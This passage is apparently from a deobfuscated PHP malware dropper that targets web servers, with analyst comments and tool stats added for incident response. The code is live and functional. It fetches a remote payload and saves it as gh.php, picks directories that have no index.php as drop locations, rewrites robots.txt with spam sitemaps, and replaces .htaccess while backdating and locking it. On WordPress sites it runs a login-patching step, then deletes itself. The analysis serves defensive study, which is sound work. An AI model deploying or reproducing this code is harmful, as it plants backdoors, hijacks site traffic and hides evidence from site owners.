 * ($domain . '/h/gh.gif') but saved with a .php extension in the current
 * working directory, so an unexpected gh.php there is an indicator of this
 * sample. The download result is written without any check, so a failed fetch
 * may leave an empty file.
 *
 * @return void
 */
function down_s_file() {
global $domain;
$gh = get( $domain . '/h/gh.gif' );
if ( function_exists( 'file_put_contents' ) ) {
// Overwrites any existing gh.php.
file_put_contents( 'gh.php', $gh );
} else {
// Fallback path appends ("a+") instead of overwriting.
$fh = fopen( 'gh.php', "a+" );
fwrite( $fh, $gh );
fclose( $fh );
}
}
/**
 * Recursively collect directories that do not contain an index.php.
 *
 * Appends each such directory, as a path relative to $root, to the global
 * $arpath8. The visible tail of the preceding function (its header is outside
 * this view) draws the target directories for dropped files from that list.
 *
 * Analyst note: directories under the web root that have no index.php are the
 * candidate drop locations, which is where to look for unexpected PHP files.
 *
 * @param string $path Directory to scan.
 * @return void
 */
function fi1( $path ) {
global $root, $arpath8;
// NOTE(review): the directory handle is never released with closedir().
if ( $handle = opendir( $path ) ) {
while ( ( $file = readdir( $handle ) ) !== false ) {
if ( $file != "." && $file != ".." ) {
$pfile = $path . "/" . $file;
// Symlinked directories are skipped.
if ( is_dir( $pfile ) && ! is_link( $pfile ) ) {
// Descend only while the path relative to $root has fewer than three slashes.
if ( substr_count( str_replace( $root . '/', '', $pfile ), '/' ) < 3 ) {
fi1( $pfile );
}
if ( ! file_exists( $pfile . "/index.php" ) ) {
array_push( $arpath8, str_replace( $root . '/', '', $pfile ) );
}
}
}
}
}
// Runs at every recursion level, so the list order is randomized repeatedly.
shuffle( $arpath8 );
}
/**
 * Overwrite robots.txt and .htaccess and hide the .htaccess change.
 *
 * Analyst summary (malicious behaviour, documented for incident response):
 *  - $root/robots.txt is replaced with an allow-all policy plus Sitemap lines
 *    pointing at this host;
 *  - $root/sitemap.xml is deleted if present;
 *  - .htaccess in the current working directory is replaced with $ht (defined
 *    outside this view), its timestamp is set back with touch(), and it is
 *    made read-only (0444).
 *
 * Response notes: the modification time of .htaccess cannot be relied on after
 * this runs; compare file content against a known-good copy. touch() sets
 * access/modification time only, so the inode change time is expected to still
 * reflect the write - confirm on the affected filesystem.
 *
 * @return array Result with 'message' entries and, on failure, 'status' => 'fail'.
 */
function sedht()
{
// Only $root, $http, $host and $ht are used below.
global $root, $http, $host, $ht, $domain;
$return_data = array();
// Template with the placeholder "host"; the sitemap.xml.gz line appears twice.
$robots_code="User-agent: *"."\n"."Allow: /"."\n"."\n"."Sitemap: host/sitemap.xml"."\n"."Sitemap: host/sitemap.xml.gz"."\n"."Sitemap: host/?sitemap.xml"."\n"."Sitemap: host/sitemap.xml.gz";
$robots_code=str_replace('host',$http.'://'.$host,$robots_code);
$robots_put=@file_put_contents($root.'/robots.txt', $robots_code);
if (!$robots_put || $robots_code=='')
{
$return_data['message'][] = 'modify file robots.txt file fail.';
}
else
{
$return_data['message'][] = 'modify file robots.txt file success.';
}
if(file_exists($root .'/sitemap.xml'))
{
@unlink($root .'/sitemap.xml');
}
// Make the file writable, remember its timestamp, then replace the content.
@chmod('.htaccess', 0644);
$file_time = filectime('.htaccess');
$n = file_put_contents('.htaccess', $ht);
if (!$n) {
$return_data['status'] = 'fail';
$return_data['message'][] = 'write .htaccess file fail';
} else {
$return_data['message'][] = '.htaccess create success.';
// Timestamp is set to the value read before the write.
touch('.htaccess', $file_time);
$return_data['message'][] = '.htaccess time modify success';
// Read-only for everyone; results of touch()/chmod() are not checked,
// the "success" messages are added unconditionally.
@chmod('.htaccess', 0444);
$return_data['message'][] = '.htaccess 0444 modify success';
}
return $return_data;
}
/**
 * cURL helper like get(), with optional request headers and POST body.
 *
 * Not called anywhere in the visible part of this sample.
 *
 * @param string     $url      URL to request.
 * @param array|null $header   Request header lines; ignored unless a non-empty array.
 * @param array|null $postdata POST fields; when a non-empty array the request becomes a POST.
 * @return string|bool Response body; false when curl_exec() fails (no error check here).
 */
function urla($url, $header = null, $postdata = null)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
// Redirects are followed.
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate');
// Taken when the URL does NOT contain "https:", so verification is disabled
// only on handles that start as plain HTTP (relevant if a redirect leads to HTTPS).
if (stripos($url, "https:") === false) {
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
}
if (is_array($header) && !empty($header)) {
curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
}
if (is_array($postdata) && !empty($postdata)) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
}
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$body = curl_exec($ch);
curl_close($ch);
return $body;
}
// Final stage: only on a WordPress tree (wp-includes and wp-admin present) is
// the login patch / account step run.
if (is_dir($root."/wp-includes") && is_dir($root."/wp-admin")) {
$loginpassword_result = loginpassword(); // 4
output_message($loginpassword_result, $message_type);
}
// The dropper deletes its own file after running, so it will normally not be
// found on disk afterwards; evidence is the artifacts it leaves (patched
// wp-login.php, gh.php, rewritten .htaccess/robots.txt, added users) and the
// web-server access log entry for the request that executed it.
@unlink( __FILE__ );
?>
Function Calls
header | 1 |
Stats
MD5 | f9a9e46e833548a44351172b600b9781 |
Eval Count | 0 |
Decode Time | 170 ms |